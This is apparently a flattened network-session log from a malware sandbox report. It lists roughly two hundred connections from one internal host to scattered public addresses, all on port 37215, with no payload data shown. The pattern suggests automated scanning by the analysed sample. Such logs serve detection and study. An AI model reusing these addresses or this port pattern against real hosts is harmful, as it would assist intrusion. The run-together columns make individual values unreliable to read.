                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19341192.168.2.133611837.171.119.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19342192.168.2.135162841.234.42.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19343192.168.2.1354136197.198.10.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19344192.168.2.1348816210.10.216.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19345192.168.2.1337708197.182.148.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19346192.168.2.13386062.113.166.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19347192.168.2.1340896197.149.164.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19348192.168.2.135921841.180.216.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19349192.168.2.1357704197.246.105.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19350192.168.2.1360652197.66.225.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19351192.168.2.1336098157.163.77.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19352192.168.2.1334490197.136.204.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19353192.168.2.1353596197.99.219.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19354192.168.2.1342316197.25.188.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19355192.168.2.1341768197.44.123.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19356192.168.2.133619841.247.43.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19357192.168.2.134175441.89.241.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19358192.168.2.1358224197.48.4.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19359192.168.2.1356558171.9.197.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19360192.168.2.1336326157.175.38.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19361192.168.2.135229641.12.32.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19362192.168.2.1352476157.203.95.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19363192.168.2.133576041.172.244.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19364192.168.2.133536276.151.125.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19365192.168.2.1337776154.136.168.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19366192.168.2.1332794157.112.4.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19367192.168.2.134607241.201.77.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19368192.168.2.1359960198.4.117.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19369192.168.2.1351620157.115.255.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19370192.168.2.136080641.64.52.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19371192.168.2.13387102.62.174.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19372192.168.2.1351408213.3.95.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19373192.168.2.133501641.5.113.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19374192.168.2.1350218157.42.255.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19375192.168.2.133831232.249.218.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19376192.168.2.1338888157.99.0.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19377192.168.2.1340014157.118.186.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19378192.168.2.134152641.190.153.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19379192.168.2.1337384197.75.92.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19380192.168.2.135680686.193.187.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19381192.168.2.134629441.99.31.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19382192.168.2.1346644197.16.168.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19383192.168.2.1343854197.44.176.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19384192.168.2.1350890197.203.27.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19385192.168.2.1336066197.161.231.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19386192.168.2.135132841.11.70.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19387192.168.2.1346738157.176.80.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19388192.168.2.1358376157.165.122.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19389192.168.2.1359406157.185.251.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19390192.168.2.1349628197.179.171.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19391192.168.2.1339110197.55.76.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19392192.168.2.1355890157.18.44.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19393192.168.2.1334686197.85.65.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19394192.168.2.134224463.205.240.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19395192.168.2.1350452157.116.230.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19396192.168.2.1351502157.212.166.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19397192.168.2.1359498157.130.115.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19398192.168.2.1341486157.201.157.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19399192.168.2.135997441.3.100.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19400192.168.2.1349816197.106.251.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19401192.168.2.1344350197.21.35.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19402192.168.2.1350828197.247.139.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19403192.168.2.1353152157.23.215.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19404192.168.2.1333760197.95.112.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19405192.168.2.1357600157.193.105.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19406192.168.2.133604267.30.90.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19407192.168.2.1358300208.15.241.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19408192.168.2.1349758157.199.79.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19409192.168.2.1358714223.34.161.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19410192.168.2.134844841.174.228.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19411192.168.2.1337766157.171.8.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19412192.168.2.133414641.151.126.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19413192.168.2.133765419.51.220.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19414192.168.2.1342476142.93.12.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19415192.168.2.1340940197.19.220.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19416192.168.2.135715457.34.60.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19417192.168.2.1335996157.97.150.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19418192.168.2.1336254157.117.157.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19419192.168.2.1346256157.67.58.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19420192.168.2.133866841.2.148.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19421192.168.2.1350518197.138.133.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19422192.168.2.134875491.103.169.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19423192.168.2.1337118197.61.163.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19424192.168.2.133537614.167.10.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19425192.168.2.134936041.27.78.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19426192.168.2.1354780157.25.78.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19427192.168.2.1358924197.171.23.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19428192.168.2.1354602136.51.230.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19429192.168.2.1350326197.180.148.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19430192.168.2.1341262157.171.35.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19431192.168.2.1352036157.16.39.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19432192.168.2.1334422197.192.243.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19433192.168.2.135980874.137.162.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19434192.168.2.1345858151.50.237.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19435192.168.2.1344668157.25.91.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19436192.168.2.1332802157.76.140.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19437192.168.2.135257241.17.212.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19438192.168.2.133547041.47.22.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19439192.168.2.134110447.91.54.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19440192.168.2.135766641.151.220.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19441192.168.2.134838641.207.208.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19442192.168.2.1338764157.35.206.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19443192.168.2.135018836.44.154.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19444192.168.2.135628641.72.108.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19445192.168.2.135186641.173.26.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19446192.168.2.1334026197.48.226.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19447192.168.2.1341354157.213.35.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19448192.168.2.1356056197.97.11.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19449192.168.2.1360982157.9.49.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19450192.168.2.1348120157.109.34.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19451192.168.2.13550922.144.65.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19452192.168.2.133745238.223.91.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19453192.168.2.1344046129.211.151.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19454192.168.2.1352528157.231.99.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19455192.168.2.1350918164.86.207.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19456192.168.2.134903641.6.37.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19457192.168.2.1359982197.226.1.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19458192.168.2.133439441.144.157.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19459192.168.2.133400041.168.49.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19460192.168.2.1355370216.184.219.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19461192.168.2.134839241.199.128.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19462192.168.2.1338714157.183.115.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19463192.168.2.134491465.57.181.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19464192.168.2.1357868157.221.73.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19465192.168.2.134253841.28.240.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19466192.168.2.133731041.137.2.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19467192.168.2.1348868197.167.33.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19468192.168.2.135973241.114.187.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19469192.168.2.135537441.212.177.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19470192.168.2.134202241.64.225.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19471192.168.2.1345658197.68.113.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19472192.168.2.1354300219.0.70.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19473192.168.2.1342054104.10.13.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19474192.168.2.135345241.48.172.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19475192.168.2.1356758156.18.14.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19476192.168.2.1337088157.40.46.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19477192.168.2.1352446104.14.217.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19478192.168.2.1358436197.121.182.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19479192.168.2.135492041.16.102.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19480192.168.2.1337958157.228.12.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19481192.168.2.133503041.213.95.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19482192.168.2.133489276.8.12.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19483192.168.2.1357996125.162.39.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19484192.168.2.133427641.170.175.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19485192.168.2.1357696197.150.7.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19486192.168.2.1346978148.26.224.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19487192.168.2.1354670157.49.242.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19488192.168.2.135215041.218.193.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19489192.168.2.1353346197.100.153.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19490192.168.2.1355612178.171.62.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19491192.168.2.1339642157.13.202.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19492192.168.2.1339166157.136.59.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19493192.168.2.1334302157.127.9.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19494192.168.2.1347430197.132.237.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19495192.168.2.133602620.238.170.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19496192.168.2.1337722158.43.0.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19497192.168.2.1352970166.155.213.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19498192.168.2.1349684197.175.69.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19499192.168.2.1339564150.31.209.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19500192.168.2.1344336197.129.135.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19501192.168.2.1358940197.52.137.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19502192.168.2.1346126147.171.9.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19503192.168.2.1333238138.91.100.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19504192.168.2.1356120197.218.75.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19505192.168.2.1344408157.169.172.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19506192.168.2.135265841.51.6.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19507192.168.2.1338644197.239.45.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19508192.168.2.1335226157.221.107.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19509192.168.2.1360992157.146.112.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19510192.168.2.1360548180.215.204.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19511192.168.2.135043041.179.255.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19512192.168.2.1358172197.206.68.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19513192.168.2.1357504157.105.168.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19514192.168.2.1348324157.180.67.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19515192.168.2.1337728197.252.41.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19516192.168.2.1344638197.41.41.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19517192.168.2.133280241.219.90.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19518192.168.2.1360608197.28.32.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19519192.168.2.134362441.221.211.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19520192.168.2.1334972197.218.91.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19521192.168.2.133636441.42.80.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19522192.168.2.1359760157.87.76.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19523192.168.2.133631441.210.200.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19524192.168.2.1351528122.153.141.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19525192.168.2.134210241.223.217.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19526192.168.2.1348176173.101.56.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19527192.168.2.1360918157.151.254.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19528192.168.2.134486218.33.246.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19529192.168.2.135010643.130.122.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19530192.168.2.134141041.210.241.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19531192.168.2.1355364124.104.201.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19532192.168.2.135936041.226.106.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19533192.168.2.1338090197.2.237.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19534192.168.2.1358488197.83.167.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19535192.168.2.134395441.64.227.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19536192.168.2.133674241.75.112.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19537192.168.2.1342942197.50.178.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19538192.168.2.1348098157.99.212.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19539192.168.2.1350436157.40.91.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19540192.168.2.1351764157.14.13.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19541192.168.2.134953666.155.21.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19542192.168.2.1357892197.98.172.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19543192.168.2.1345238197.54.16.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19544192.168.2.133473641.40.48.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19545192.168.2.1351978197.208.170.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19546192.168.2.1344234157.98.134.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19547192.168.2.1343494197.81.121.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19548192.168.2.1345720212.155.192.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19549192.168.2.134289241.79.81.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
